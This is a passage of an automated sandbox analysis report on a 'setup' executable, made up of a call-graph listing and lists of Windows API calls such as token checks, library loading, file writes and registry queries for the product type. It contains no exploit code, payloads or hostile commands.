2 library calls 45222->45420 45225 bdd457 45224->45225 45227 bdd5c0 45225->45227 45228 bdd659 45225->45228 45232 baacf0 52 API calls 45225->45232 45227->45228 45230 baacf0 52 API calls 45227->45230 45427 bde9e0 56 API calls 45228->45427 45229 bdd44b 45421 ba8960 40 API calls 2 library calls 45229->45421 45235 bdd610 45230->45235 45236 bdd536 45232->45236 45234 bdd688 45239 bdd6bc Sleep 45234->45239 45246 bdd6c7 45234->45246 45235->45118 45237 bdd61a 45235->45237 45236->45110 45238 bdd540 45236->45238 45240 bc2290 120 API calls 45237->45240 45241 bc2290 120 API calls 45238->45241 45239->45246 45242 bdd640 45240->45242 45243 bdd566 45241->45243 45426 ccb1b0 130 API calls 45242->45426 45425 ccef90 73 API calls 45243->45425 45428 ba8960 40 API calls 2 library calls 45246->45428 45247 bdd64e 45249 d00070 208 API calls 45247->45249 45248 bdd5ac 45251 d00070 208 API calls 45248->45251 45249->45228 45251->45227 45252 bdd710 45254 d7fd55 _ValidateLocalCookies 5 API calls 45252->45254 45253 bdd57b 45253->45248 45255 bc2290 120 API calls 45253->45255 45256 bdd72d 45254->45256 45255->45248 45257->45103 45258->45108 45259->45116 45260->45121 45261->45135 45262->45139 45263->45144 45264->45149 45265->45157 45266->45176 45268 cc7328 GetCurrentProcess OpenProcessToken 45267->45268 45269 cc734c GetTokenInformation 45268->45269 45270 cc733f GetLastError 45268->45270 45272 cc736f GetLastError 45269->45272 45273 cc739b 45269->45273 45271 cc73f4 45270->45271 45276 cc742d 45271->45276 45277 cc741f CloseHandle 45271->45277 45274 cc73ee GetLastError 45272->45274 45278 cc737a 45272->45278 45273->45274 45275 cc73a1 AllocateAndInitializeSid 45273->45275 45274->45271 45275->45271 45279 cc73d2 EqualSid FreeSid 45275->45279 45280 d7fd55 _ValidateLocalCookies 5 API calls 45276->45280 45277->45276 45282 cc7385 GetTokenInformation 45278->45282 45279->45271 45281 bdd396 45280->45281 45281->45202 45281->45203 45282->45273 45282->45274 45284 baad28 45283->45284 45296 baad7c 45283->45296 45285 d80260 
4 API calls 45284->45285 45287 baad32 45285->45287 45286 d80260 4 API calls 45288 baad96 45286->45288 45289 baad3e GetProcessHeap 45287->45289 45287->45296 45297 baae07 45288->45297 45449 d80118 43 API calls 45288->45449 45447 d80118 43 API calls 45289->45447 45292 baad6b 45448 d80216 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 45292->45448 45293 baadf6 45450 d80216 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 45293->45450 45296->45286 45296->45297 45297->45105 45298 bc2290 45297->45298 45307 bc2321 std::locale::_Locimp::_Locimp 45298->45307 45308 bc22b6 ___crtCompareStringW __set_se_translator 45298->45308 45299 baa9b0 2 API calls 45300 bc236c 45299->45300 45301 bc23db 45300->45301 45302 bc23ce FindClose 45300->45302 45453 baa600 RtlAllocateHeap RaiseException 45301->45453 45302->45301 45304 bc234f 45304->45127 45306 bc23f7 45310 baacf0 52 API calls 45306->45310 45307->45299 45307->45304 45308->45307 45451 d852ff 13 API calls __dosmaperr 45308->45451 45309 bc233d 45452 d851df 40 API calls __cftof 45309->45452 45315 bc2409 45310->45315 45312 bc27bc 45313 baa9b0 2 API calls 45312->45313 45314 bc27c6 45313->45314 45465 baa4e0 45314->45465 45315->45312 45317 bc2431 45315->45317 45318 bc243f 45315->45318 45454 baa2a0 49 API calls 45317->45454 45318->45318 45455 baa830 42 API calls 4 library calls 45318->45455 45320 bc280f 45323 bc2a0c 45320->45323 45324 bc2a30 45320->45324 45335 bc2845 45320->45335 45322 bc243d 45326 bc25d5 FindFirstFileW 45322->45326 45327 bc2486 PathIsUNCW 45322->45327 45329 bc26ac 45322->45329 45323->45127 45325 baa9b0 2 API calls 45324->45325 45330 bc2a3a 45325->45330 45326->45329 45333 bc25ed GetFullPathNameW 45326->45333 45331 bc249b 45327->45331 45332 bc2565 45327->45332 45328 bc2862 45485 bc2be0 54 API calls 45328->45485 45329->45127 45456 bb5b60 54 API calls 4 library calls 45331->45456 45459 bb5b60 54 API calls 4 library calls 45332->45459 45334 bc2606 45333->45334 45379 bc2741 
___crtCompareStringW 45333->45379 45339 bc2621 GetFullPathNameW 45334->45339 45335->45328 45484 bc2c90 RtlAllocateHeap RaiseException 45335->45484 45344 bc263a ___crtCompareStringW 45339->45344 45341 bc286d 45343 bc2290 112 API calls 45341->45343 45342 baa9b0 2 API calls 45342->45312 45345 bc2881 45343->45345 45349 bc26e6 45344->45349 45360 bc266e 45344->45360 45344->45379 45345->45323 45350 bc28b4 PathIsUNCW 45345->45350 45346 bc24a3 45346->45326 45457 bb5f50 105 API calls 7 library calls 45346->45457 45347 bc256d 45347->45326 45365 bc2531 45347->45365 45362 bc26f8 _wcsrchr 45349->45362 45461 baa6b0 42 API calls 4 library calls 45349->45461 45351 bc28c8 45350->45351 45352 bc2997 45350->45352 45486 bb5b60 54 API calls 4 library calls 45351->45486 45489 bb5b60 54 API calls 4 library calls 45352->45489 45357 bc251e 45458 bc2b70 42 API calls 45357->45458 45359 bc26a4 SetLastError 45359->45329 45360->45359 45364 bc2697 FindClose 45360->45364 45363 bc2718 _wcsrchr 45362->45363 45462 baa6b0 42 API calls 4 library calls 45362->45462 45367 bc272b 45363->45367 45368 bc2745 45363->45368 45364->45359 45460 bc2a40 42 API calls 3 library calls 45365->45460 45371 bc2793 45367->45371 45367->45379 45463 baa6b0 42 API calls 4 library calls 45367->45463 45368->45379 45464 baa6b0 42 API calls 4 library calls 45368->45464 45369 bc28d0 45369->45323 45372 bc2934 45369->45372 45370 bc299f 45370->45323 45490 bc2a40 42 API calls 3 library calls 45370->45490 45371->45329 45487 bb5f50 105 API calls 7 library calls 45372->45487 45377 bc2951 45488 bc2b70 42 API calls 45377->45488 45379->45342 45379->45371 45380 bc2963 45380->45370 45382 d000b6 EnterCriticalSection 45381->45382 45383 d000ab InitializeCriticalSection 45381->45383 45496 d00370 45382->45496 45383->45382 45385 d000cd 45582 d00290 72 API calls _ValidateLocalCookies 45385->45582 45387 d000d5 WriteFile FlushFileBuffers 45388 d00113 45387->45388 45389 baacf0 52 API calls 45388->45389 45390 d00120 45389->45390 45391 d00279 45390->45391 
45394 d00153 45390->45394 45395 d00148 45390->45395 45392 baa9b0 2 API calls 45391->45392 45393 d00283 45392->45393 45584 baa830 42 API calls 4 library calls 45394->45584 45583 baa2a0 49 API calls 45395->45583 45398 d00151 45399 d0015f WriteFile FlushFileBuffers 45398->45399 45400 d001a0 WriteFile FlushFileBuffers 45399->45400 45401 d00198 45399->45401 45402 baacf0 52 API calls 45400->45402 45401->45400 45403 d001c9 45402->45403 45403->45391 45404 d001d1 45403->45404 45405 d001f1 45404->45405 45406 d001fc 45404->45406 45585 baa2a0 49 API calls 45405->45585 45586 baa830 42 API calls 4 library calls 45406->45586 45409 d00208 WriteFile FlushFileBuffers 45411 d0023f 45409->45411 45410 d001fa 45410->45409 45411->45097 45412->45187 45413->45185 45414->45179 45415->45197 45416->45206 45417->45216 45418->45211 45419->45222 45420->45229 45421->45225 45422->45221 45423->45221 45424->45224 45425->45253 45426->45247 45427->45234 45428->45252 45432->45128 45434->45133 45435->45138 45436->45145 45437->45161 45438->45173 45439->45180 45440->45189 45445->45171 45446->45184 45447->45292 45448->45296 45449->45293 45450->45297 45451->45309 45452->45307 45453->45306 45454->45322 45455->45322 45456->45346 45457->45357 45458->45365 45459->45347 45460->45326 45461->45362 45462->45363 45463->45379 45464->45379 45466 baa4eb 45465->45466 45467 baa4fa 45466->45467 45468 baa59a 45466->45468 45469 baa517 __set_se_translator 45466->45469 45467->45320 45495 baa770 42 API calls 45468->45495 45470 baa55d std::locale::_Locimp::_Locimp 45469->45470 45472 baa53e 45469->45472 45479 baa57f 45469->45479 45470->45320 45491 d852ff 13 API calls __dosmaperr 45472->45491 45473 baa59f 45475 baa4e0 42 API calls 45473->45475 45476 baa5d6 45475->45476 45476->45320 45477 baa543 45492 d851df 40 API calls __cftof 45477->45492 45479->45470 45493 d852ff 13 API calls __dosmaperr 45479->45493 45480 baa54e 45480->45320 45482 baa588 45494 d851df 40 API calls __cftof 45482->45494 45484->45328 45485->45341 45486->45369 
45487->45377 45488->45380 45489->45370 45490->45323 45491->45477 45492->45480 45493->45482 45494->45470 45495->45473 45497 d003a7 45496->45497 45498 d009a3 45496->45498 45499 d003dc CreateFileW 45497->45499 45518 d003c8 45497->45518 45498->45385 45501 d0040d GetLastError 45499->45501 45499->45518 45501->45518 45502 baacf0 52 API calls 45502->45518 45503 d004ed 45504 d004f8 45503->45504 45504->45498 45506 d00511 45504->45506 45507 d00748 45504->45507 45505 d009ca 45508 baa9b0 2 API calls 45505->45508 45509 baacf0 52 API calls 45506->45509 45507->45498 45514 baacf0 52 API calls 45507->45514 45510 d009d4 45508->45510 45511 d00516 45509->45511 45512 baa9b0 2 API calls 45510->45512 45511->45505 45520 d00541 45511->45520 45521 d0054c 45511->45521 45513 d009de 45512->45513 45517 d0075f 45514->45517 45517->45510 45526 d00795 45517->45526 45527 d0078a 45517->45527 45518->45497 45518->45499 45518->45501 45518->45502 45518->45503 45518->45505 45610 d00b90 151 API calls _ValidateLocalCookies 45518->45610 45611 baa2a0 49 API calls 45518->45611 45612 baa830 42 API calls 4 library calls 45518->45612 45613 cc7090 123 API calls 45518->45613 45614 baa600 RtlAllocateHeap RaiseException 45518->45614 45615 baa2a0 49 API calls 45520->45615 45616 baa830 42 API calls 4 library calls 45521->45616 45522 d0047d OutputDebugStringW 45522->45518 45525 d0054a 45617 cc7090 123 API calls 45525->45617 45622 baa830 42 API calls 4 library calls 45526->45622 45621 baa2a0 49 API calls 45527->45621 45532 d00793 45623 cc7090 123 API calls 45532->45623 45533 d0056b 45618 cb20c0 123 API calls 45533->45618 45536 d00581 OutputDebugStringW 45541 d005a6 45536->45541 45537 d007b4 45624 cb20c0 123 API calls 45537->45624 45539 d007ca OutputDebugStringW 45540 d007ef 45539->45540 45544 d00836 WriteFile FlushFileBuffers 45540->45544 45545 d0082e 45540->45545 45542 d00601 45541->45542 45543 d005f4 SetFilePointer 45541->45543 45542->45498 45546 d00617 WriteFile FlushFileBuffers 45542->45546 45543->45542 45549 d0086b 
45544->45549 45545->45544 45547 cd1040 28 API calls 45546->45547 45548 d00637 45547->45548 45550 baacf0 52 API calls 45548->45550 45625 baa830 42 API calls 4 library calls 45549->45625 45552 d0064b 45550->45552 45552->45505 45619 ba9d10 71 API calls 45552->45619 45553 d00877 45587 d009e0 45553->45587 45556 bc2290 120 API calls 45557 d00898 45556->45557 45562 bc2290 120 API calls 45557->45562 45559 d006b1 45561 bc2290 120 API calls 45559->45561 45563 d006c3 WriteFile FlushFileBuffers 45561->45563 45564 d008c5 WriteFile FlushFileBuffers 45562->45564 45565 d006fe 45563->45565 45566 d008fd 45564->45566 45567 baacf0 52 API calls 45565->45567 45568 baacf0 52 API calls 45566->45568 45569 d0070b 45567->45569 45570 d0090a 45568->45570 45569->45505 45569->45549 45572 d0073a 45569->45572 45570->45505 45571 d00912 45570->45571 45573 d00940 45571->45573 45574 d00935 45571->45574 45620 baa2a0 49 API calls 45572->45620 45627 baa830 42 API calls 4 library calls 45573->45627 45626 baa2a0 49 API calls 45574->45626 45578 d0093e 45579 d0094c WriteFile FlushFileBuffers 45578->45579 45579->45498 45581 d00989 45579->45581 45580 d00743 45580->45553 45581->45385 45582->45387 45583->45398 45584->45399 45585->45410 45586->45409 45588 d00a51 45587->45588 45591 d00aad 45587->45591 45589 baacf0 52 API calls 45588->45589 45590 d00a56 45589->45590 45592 d00a60 45590->45592 45593 d00b7c 45590->45593 45596 baacf0 52 API calls 45591->45596 45597 d00a81 45592->45597 45598 d00a8c 45592->45598 45594 baa9b0 2 API calls 45593->45594 45595 d00b86 45594->45595 45599 d00b17 45596->45599 45641 baa2a0 49 API calls 45597->45641 45642 baa830 42 API calls 4 library calls 45598->45642 45599->45593 45602 d00b1d 45599->45602 45605 d00b4a 45602->45605 45606 d00b3f 45602->45606 45603 d7fd55 _ValidateLocalCookies 5 API calls 45604 d00886 45603->45604 45604->45556 45628 cb49f0 45605->45628 45643 baa2a0 49 API calls 45606->45643 45609 d00a8a 45609->45603 45610->45518 45611->45518 45612->45518 45613->45522 45614->45518 
45615->45525 45616->45525 45617->45533 45618->45536 45619->45559 45620->45580 45621->45532 45622->45532 45623->45537 45624->45539 45625->45553 45626->45578 45627->45579 45629 cb4a5a 45628->45629 45630 cb49fd MultiByteToWideChar 45628->45630 45644 baa600 RtlAllocateHeap RaiseException 45629->45644 45630->45629 45633 cb4a15 45630->45633 45632 cb4a61 45632->45609 45634 cb4a30 MultiByteToWideChar 45633->45634 45635 cb4a69 45634->45635 45636 cb4a47 45634->45636 45637 baa9b0 2 API calls 45635->45637 45636->45609 45638 cb4a73 45637->45638 45645 cb4c70 54 API calls 45638->45645 45640 cb4a92 45640->45609 45641->45609 45642->45609 45643->45609 45644->45632 45645->45640 45646 bdc690 45706 bb1d80 70 API calls 3 library calls 45646->45706 45648 bdc6d9 45649 bdc6fe 45648->45649 45713 bad630 41 API calls 3 library calls 45648->45713 45707 ba8960 40 API calls 2 library calls 45649->45707 45652 bdc70d 45708 ba8300 41 API calls 2 library calls 45652->45708 45654 bdc731 45709 d1f560 45654->45709 45657 bdc81d 45658 d851ef std::_Throw_Cpp_error 40 API calls 45657->45658 45660 bdc822 45658->45660 45659 bdc77e std::ios_base::_Ios_base_dtor 45661 bdc7ef 45659->45661 45662 bdc7b3 LoadLibraryExW 45659->45662 45663 baacf0 52 API calls 45660->45663 45666 d7fd55 _ValidateLocalCookies 5 API calls 45661->45666 45662->45661 45664 bdc7c5 GetProcAddress GetProcAddress GetProcAddress 45662->45664 45665 bdc86a 45663->45665 45664->45661 45667 bdc981 45665->45667 45673 bdc874 45665->45673 45668 bdc817 45666->45668 45669 baa9b0 2 API calls 45667->45669 45670 bdc98b 45669->45670 45671 baacf0 52 API calls 45670->45671 45672 bdc9c3 45671->45672 45674 bdcabc 45672->45674 45681 baacf0 52 API calls 45672->45681 45675 bc2290 120 API calls 45673->45675 45676 baa9b0 2 API calls 45674->45676 45677 bdc8b9 45675->45677 45678 bdcac6 45676->45678 45679 bc2290 120 API calls 45677->45679 45680 bdc8c8 45679->45680 45682 bc2290 120 API calls 45680->45682 45683 bdc9ea 45681->45683 45684 bdc8d7 45682->45684 45683->45674 
45688 baacf0 52 API calls 45683->45688 45685 bdc8fb 45684->45685 45686 bc2290 120 API calls 45684->45686 45714 ba8300 41 API calls 2 library calls 45685->45714 45687 bdc8ec 45686->45687 45689 bc2290 120 API calls 45687->45689 45691 bdca0e 45688->45691 45689->45685 45691->45674 45693 baacf0 52 API calls 45691->45693 45692 bdc938 45694 bdca39 45693->45694 45694->45674 45695 bdca3d 45694->45695 45715 bc2b70 42 API calls 45695->45715 45697 bdca5c 45716 bc2b70 42 API calls 45697->45716 45699 bdca67 45717 bc2b70 42 API calls 45699->45717 45701 bdca72 45718 bc2b70 42 API calls 45701->45718 45703 bdca8f 45719 bde860 42 API calls 45703->45719 45705 bdca9b 45706->45648 45707->45652 45708->45654 45710 d1f5a7 45709->45710 45712 bdc744 45710->45712 45720 d1f650 45710->45720 45712->45657 45712->45659 45713->45649 45714->45692 45715->45697 45716->45699 45717->45701 45718->45703 45719->45705 45721 d1f69d 45720->45721 45722 d1f69f CreateFileW 45720->45722 45721->45722 45723 d1f6bf 45722->45723 45734 bc2200 45723->45734 45725 d1f6ee __set_se_translator 45726 d1f757 45725->45726 45727 d1f73a WriteFile 45725->45727 45730 d1f7dd 45726->45730 45731 d1f787 std::ios_base::_Ios_base_dtor 45726->45731 45727->45725 45727->45726 45728 d1f7c9 45728->45712 45729 d1f7bb CloseHandle 45729->45728 45732 d851ef std::_Throw_Cpp_error 40 API calls 45730->45732 45731->45728 45731->45729 45733 d1f7e2 45732->45733 45735 bc2210 45734->45735 45736 bc2273 45734->45736 45737 bc2218 45735->45737 45738 bc2246 45735->45738 45751 ba7d00 41 API calls std::_Throw_Cpp_error 45736->45751 45740 bc221f 45737->45740 45741 bc2278 45737->45741 45742 bc2262 45738->45742 45744 d7fd94 std::_Facet_Register 2 API calls 45738->45744 45743 d7fd94 std::_Facet_Register 2 API calls 45740->45743 45752 ba8830 41 API calls 3 library calls 45741->45752 45742->45725 45746 bc2225 45743->45746 45747 bc2250 45744->45747 45748 d851ef std::_Throw_Cpp_error 40 API calls 45746->45748 45749 bc222e 45746->45749 45747->45725 45750 bc2282 

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 00CC7328
                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00CC7335
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CC733F
                                                                                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00DEB0F5), ref: 00CC7369
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00CC736F
                                                                                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00DEB0F5,00DEB0F5,00DEB0F5,00DEB0F5), ref: 00CC7395
                                                                                                                                                                              • AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00CC73C8
                                                                                                                                                                              • EqualSid.ADVAPI32(00000000,?), ref: 00CC73D7
                                                                                                                                                                              • FreeSid.ADVAPI32(?), ref: 00CC73E6
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00CC7420
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Token$ErrorInformationLastProcess$AllocateCloseCurrentEqualFreeHandleInitializeOpen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 695978879-0

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryW.KERNEL32(ComCtl32.dll,02141699,?,00000000,00000000), ref: 00CCF15E
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 00CCF181
                                                                                                                                                                              • GetSystemMetrics.USER32(0000000C), ref: 00CCF1BC
                                                                                                                                                                              • GetSystemMetrics.USER32(0000000B), ref: 00CCF1D2
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00CCF1FF
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LibraryMetricsSystem$AddressFreeLoadProc
                                                                                                                                                                              • String ID: ComCtl32.dll$LoadIconMetric
                                                                                                                                                                              • API String ID: 499052680-764666640

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadStringW.USER32(?,00000000,?,00000100), ref: 00CD3EBC
                                                                                                                                                                              • LoadStringW.USER32(?,00000000,?,00000001), ref: 00CD3FDD
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LoadString
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2948472770-0

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              control_flow_graph 444 c889f0-c88a39 GetSystemDirectoryW 445 c88b2f 444->445 446 c88a3f-c88a44 444->446 447 c88b31-c88b52 call d7fd55 445->447 446->445 448 c88a4a-c88a53 call baacf0 446->448 453 c88a59-c88a73 448->453 454 c88b53-c88d79 call baa9b0 call d7fd94 call bbf0f0 448->454 458 c88a83-c88a89 453->458 459 c88a75-c88a81 call baa2a0 453->459 463 c88a90-c88a99 458->463 467 c88aac-c88ac4 call bc2290 459->467 463->463 466 c88a9b-c88aa7 call baa830 463->466 466->467 473 c88aca-c88acf 467->473 474 c88ac6-c88ac8 467->474 476 c88ad0-c88ad9 473->476 475 c88adf-c88af9 call bc2290 call d81548 474->475 482 c88afb-c88afd 475->482 483 c88aff-c88b0a LoadLibraryExW 475->483 476->476 478 c88adb-c88add 476->478 478->475 484 c88b0c-c88b21 482->484 483->484 485 c88b2b-c88b2d 484->485 486 c88b23-c88b26 484->486 485->447 486->485
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00C88A31
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                                • Part of subcall function 00BAA2A0: FindResourceW.KERNEL32(00000000,?,00000006,?,?,*.*,8007000E,80004005,00BC2B04,00000000,?,?,?,*.*,?,80070057), ref: 00BAA2C3
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000,00DE0ACD,000000FF), ref: 00C88B04
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Init_thread_footer$DirectoryFindHeapLibraryLoadProcessResourceSystem
                                                                                                                                                                              • String ID: UxTheme.dll
                                                                                                                                                                              • API String ID: 2586271605-352951104

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              control_flow_graph 487 d7f902-d7f918 GetProcessHeap HeapAlloc 488 d7f91e-d7f924 call d7f694 487->488 489 d7f91a-d7f91d 487->489 491 d7f929-d7f937 488->491 492 d7f945 call d7f7a0 491->492 493 d7f939-d7f943 491->493 496 d7f94a-d7f950 492->496 493->496 497 d7f963-d7f966 496->497 498 d7f952-d7f961 GetProcessHeap HeapFree 496->498 498->489
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000008,?,00BB83B7,?,?,00BB8164,?), ref: 00D7F907
                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F90E
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00BB8164,?), ref: 00D7F954
                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F95B
                                                                                                                                                                                • Part of subcall function 00D7F7A0: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00D7F94A,00000000,?,?,00BB8164,?), ref: 00D7F7C4
                                                                                                                                                                                • Part of subcall function 00D7F7A0: HeapAlloc.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F7CB
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$Process$Alloc$Free
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1864747095-0

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              control_flow_graph 500 ccbda0-ccbdda 501 ccbddc-ccbddf 500->501 502 ccbde4-ccbde7 500->502 503 ccbeb5-ccbed0 call d7fd55 501->503 504 ccbded-ccbdef 502->504 505 ccbeb0 502->505 507 ccbdf5-ccbdf9 504->507 508 ccbed1-ccbedb call baa9b0 504->508 505->503 510 ccbe0b-ccbe0e 507->510 511 ccbdfb-ccbdfe 507->511 510->508 515 ccbe14-ccbe19 510->515 511->508 513 ccbe04-ccbe09 511->513 513->510 516 ccbe1f-ccbe5f call d820e0 FindFirstFileW 513->516 515->505 515->516 519 ccbe7e-ccbe84 GetLastError 516->519 520 ccbe61-ccbe7c 516->520 521 ccbe86-ccbe99 519->521 520->521 522 ccbeac-ccbeae 521->522 523 ccbe9b-ccbea2 FindClose 521->523 522->503 523->522
                                                                                                                                                                              APIs
                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?), ref: 00CCBE3D
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00CCBE9C
                                                                                                                                                                                • Part of subcall function 00BAA9B0: RtlAllocateHeap.NTDLL(?,00000000,?,02141699,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00D11D86,8000000B,02141699), ref: 00BAA9FA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$AllocateCloseFileFirstHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1673784098-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • __set_se_translator.LIBVCRUNTIME ref: 00BDC5E8
                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00CCAD60), ref: 00BDC5FE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExceptionFilterUnhandled__set_se_translator
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2480343447-0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00CD0DC0: __Init_thread_footer.LIBCMT ref: 00CD0EA0
                                                                                                                                                                              • CoCreateInstance.COMBASE(00E170E8,00000000,00000001,00E34C18,00000010), ref: 00D16EBE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateInit_thread_footerInstance
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3436645735-0
                                                                                                                                                                              • Opcode ID: 9ba1a07129082a08d723e8c8d5b061c94c209166b1aa83fa7a19f5216529106b
                                                                                                                                                                              • Instruction ID: bcbb026f6b8d35b4c4bfdb7c8249a4a225e579749561f4caa3da14cdddf0d2c4
                                                                                                                                                                              • Opcode Fuzzy Hash: 9ba1a07129082a08d723e8c8d5b061c94c209166b1aa83fa7a19f5216529106b
                                                                                                                                                                              • Instruction Fuzzy Hash: D511C0B1644304EFD720CF59D804B8ABBF8EB05B20F10465EF825AB7C0C7B6A508CBA0

                                                                                                                                                                              Control-flow Graph
                                                                                                                                                                              • [Figure: control-flow graph of this function; legend: Executed / Not Executed]
                                                                                                                                                                              APIs
                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000002,SYSTEM\CurrentControlSet\Control\ProductOptions,00000000,00020119,00000000), ref: 00CD14E0
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,ProductType,00000000,00000000,?), ref: 00CD151B
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,ProductSuite,00000000,00000000,?,?), ref: 00CD1596
                                                                                                                                                                              • RegCloseKey.KERNEL32(00000000), ref: 00CD176E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: QueryValue$CloseOpen
                                                                                                                                                                              • String ID: BackOffice$Blade$CommunicationServer$Compute Server$DataCenter$Embedded(Restricted)$EmbeddedNT$Enterprise$Personal$ProductSuite$ProductType$SYSTEM\CurrentControlSet\Control\ProductOptions$Security Appliance$ServerNT$Small Business$Small Business(Restricted)$Storage Server$Terminal Server$WinNT
                                                                                                                                                                              • API String ID: 1586453840-3149529848
